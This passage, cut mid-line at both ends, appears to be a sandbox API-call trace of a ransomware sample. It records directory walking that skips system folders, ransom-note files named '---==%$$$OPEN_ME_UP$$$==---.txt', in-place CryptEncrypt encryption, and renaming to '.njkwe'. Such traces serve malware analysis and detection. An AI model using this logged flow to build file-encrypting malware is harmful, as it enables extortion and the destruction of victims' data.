(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\prov\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0075.891] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0075.892] CloseHandle (hObject=0x434) returned 1 [0075.892] GetProcessHeap () returned 0xbe0000 [0075.892] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0075.892] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1854d2, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1854d2, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1854d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 0 [0075.892] FindClose (in: hFindFile=0xc1a060 | out: hFindFile=0xc1a060) returned 1 [0075.892] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 112 [0075.892] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0075.894] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0075.895] CloseHandle (hObject=0x430) returned 1 [0075.895] GetProcessHeap () returned 0xbe0000 [0075.895] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0075.895] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{8fb7d64e-70fc-4f9d-89ee-d486817534df}", cAlternateFileName="{8FB7D~1")) returned 1 [0075.895] lstrcmpiW (lpString1="{8fb7d64e-70fc-4f9d-89ee-d486817534df}", lpString2="Windows") returned -1 [0075.895] lstrcmpiW (lpString1="{8fb7d64e-70fc-4f9d-89ee-d486817534df}", lpString2="$Recycle.bin") returned 1 [0075.895] lstrcmpiW (lpString1="{8fb7d64e-70fc-4f9d-89ee-d486817534df}", lpString2="System Volume Information") returned -1 [0075.895] lstrcmpiW (lpString1="{8fb7d64e-70fc-4f9d-89ee-d486817534df}", lpString2="Program Files") returned -1 [0075.895] lstrcmpiW (lpString1="{8fb7d64e-70fc-4f9d-89ee-d486817534df}", lpString2="Program Files (x86)") returned -1 [0075.895] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}") returned 80 [0075.895] lstrcmpW (lpString1="{8fb7d64e-70fc-4f9d-89ee-d486817534df}", lpString2=".") returned 1 [0075.895] lstrcmpW (lpString1="{8fb7d64e-70fc-4f9d-89ee-d486817534df}", lpString2="..") returned 1 [0075.895] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0075.895] GetProcessHeap () returned 0xbe0000 [0075.895] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0075.895] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*") returned 82 [0075.895] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a060 [0075.896] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.896] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.896] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.896] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.896] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.896] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\.") returned 82 [0075.896] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.896] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0075.896] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.896] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.896] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.896] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.896] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.896] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\..") returned 83 [0075.896] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.896] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.896] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53fedfc8, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53fedfc8, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53fedfc8, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x380, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="customizations.xml", cAlternateFileName="")) returned 1 [0075.896] lstrcmpiW (lpString1="customizations.xml", lpString2="Windows") returned -1 [0075.896] lstrcmpiW (lpString1="customizations.xml", lpString2="$Recycle.bin") returned 1 [0075.896] lstrcmpiW (lpString1="customizations.xml", lpString2="System Volume Information") returned -1 [0075.896] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files") returned -1 [0075.896] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files (x86)") returned -1 [0075.896] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml") returned 99 [0075.896] StrStrIW (lpFirst="customizations.xml", lpSrch=".njkwe") returned 0x0 [0075.896] lstrcmpW (lpString1="customizations.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.896] lstrcmpW (lpString1="customizations.xml", lpString2="taridd") returned -1 [0075.896] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0075.896] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0075.897] GetTickCount () returned 0x1153516 [0075.897] GetTickCount () returned 0x1153516 [0075.897] GetTickCount () returned 0x1153516 [0075.897] GetTickCount () returned 0x1153516 [0075.897] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0075.897] GetProcessHeap () returned 0xbe0000 [0075.897] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0075.897] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x380, lpOverlapped=0x0) returned 1 [0075.899] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffc80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.899] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x380, lpOverlapped=0x0) returned 1 [0075.899] GetProcessHeap () returned 0xbe0000 [0075.899] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0075.899] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.899] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0075.899] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0075.899] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0075.899] CloseHandle (hObject=0x434) returned 1 [0075.899] GetProcessHeap () returned 0xbe0000 [0075.899] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0075.899] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml_r00t_{3sXlE5}.njkwe") returned 119 [0075.899] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml_r00t_{3sxle5}.njkwe")) returned 1 [0075.900] GetProcessHeap () returned 0xbe0000 [0075.900] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0075.900] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53fc7d5e, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53fc7d5e, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53fc7d5e, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDatastore.xml", cAlternateFileName="")) returned 1 [0075.900] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Windows") returned -1 [0075.900] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="$Recycle.bin") returned 1 [0075.900] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="System Volume Information") returned -1 [0075.900] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files") returned -1 [0075.900] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files (x86)") returned -1 [0075.900] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml") returned 100 [0075.900] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch=".njkwe") returned 0x0 [0075.900] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.900] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="taridd") returned -1 [0075.900] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0075.900] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0075.900] GetTickCount () returned 0x1153516 [0075.900] GetTickCount () returned 0x1153516 [0075.900] GetTickCount () returned 0x1153516 [0075.900] GetTickCount () returned 0x1153516 [0075.900] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0075.901] GetProcessHeap () returned 0xbe0000 [0075.901] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0075.901] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0076.024] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffef1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.024] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0076.024] GetProcessHeap () returned 0xbe0000 [0076.024] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0076.024] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.024] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0076.025] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0076.025] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0076.025] CloseHandle (hObject=0x434) returned 1 [0076.025] GetProcessHeap () returned 0xbe0000 [0076.025] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0076.025] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe") returned 120 [0076.025] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml_r00t_{3sxle5}.njkwe")) returned 1 [0076.026] GetProcessHeap () returned 0xbe0000 [0076.026] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0076.026] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 1 [0076.026] lstrcmpiW (lpString1="Prov", lpString2="Windows") returned -1 [0076.026] lstrcmpiW (lpString1="Prov", lpString2="$Recycle.bin") returned 1 [0076.026] lstrcmpiW (lpString1="Prov", lpString2="System Volume Information") returned -1 [0076.026] lstrcmpiW (lpString1="Prov", lpString2="Program Files") returned 1 [0076.026] lstrcmpiW (lpString1="Prov", lpString2="Program Files (x86)") returned 1 [0076.026] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov") returned 85 [0076.026] lstrcmpW (lpString1="Prov", lpString2=".") returned 1 [0076.026] lstrcmpW (lpString1="Prov", lpString2="..") returned 1 [0076.027] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0076.027] GetProcessHeap () returned 0xbe0000 [0076.027] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0076.027] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\*") returned 87 [0076.027] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ee0 [0076.027] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.027] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.027] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.027] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.027] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.027] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\.") returned 87 [0076.027] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.028] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0076.028] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.028] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.028] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.028] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.028] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.028] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\..") returned 88 [0076.028] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.028] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.028] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime", cAlternateFileName="")) returned 1 [0076.028] lstrcmpiW (lpString1="RunTime", lpString2="Windows") returned -1 [0076.028] lstrcmpiW (lpString1="RunTime", lpString2="$Recycle.bin") returned 1 [0076.028] lstrcmpiW (lpString1="RunTime", lpString2="System Volume Information") returned -1 [0076.028] lstrcmpiW (lpString1="RunTime", lpString2="Program Files") returned 1 [0076.028] lstrcmpiW (lpString1="RunTime", lpString2="Program Files (x86)") returned 1 [0076.028] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime") returned 93 [0076.028] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1 [0076.028] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1 [0076.028] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0076.028] GetProcessHeap () returned 0xbe0000 [0076.028] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0076.028] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\*") returned 95 [0076.028] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19e20 [0076.028] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.028] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.028] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.028] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.028] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.029] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: 